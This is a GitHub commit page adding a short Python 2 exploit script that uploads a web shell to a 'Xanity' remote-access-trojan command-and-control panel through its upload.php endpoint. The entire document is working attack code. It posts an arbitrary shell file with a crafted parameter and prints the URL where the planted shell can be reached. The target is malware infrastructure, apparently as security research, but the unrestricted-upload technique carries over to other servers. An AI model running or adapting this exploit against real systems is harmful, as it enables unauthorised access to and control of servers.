File tree Expand file tree Collapse file tree 1 file changed +28
-0
lines changed Expand file tree Collapse file tree 1 file changed +28
-0
lines changed Original file line number Diff line number Diff line change 1+ #!/usr/bin/python2
2+ # coding: utf-8
3+ # Xanity RAT C&C Panel Shell Upload Exploit
4+ # Written before coffee happened.
5+ # Author: Darren Martyn
6+ # Licence: WTFPL - wtfpl.net
7+ import requests
8+ import sys
9+ import os
10+
11+ def upload_shell (url , shell ):
12+ up_url = url + "?d=lol" # add "d" param
13+ try :
14+ files = {'file' : open (shell , "rb" )}
15+ r = requests .post (url = up_url , files = files )
16+ except :
17+ sys .exit ("[-] failure" )
18+ if "1" in r .text : # the next line is ugly as sin.
19+ print "[+] Shell Uploaded! It should be in: %s" % (url .replace ("upload.php" , "lol/%s" % (os .path .basename (shell ))))
20+
21+
22+ def main (args ):
23+ if len (args ) != 3 :
24+ sys .exit ("use: %s http://xanity.skids/upload.php /your/shell.php" % (args [0 ]))
25+ upload_shell (url = args [1 ], shell = args [2 ])
26+
27+ if __name__ == "__main__" :
28+ main (args = sys .argv )
You can’t perform that action at this time.
0 commit comments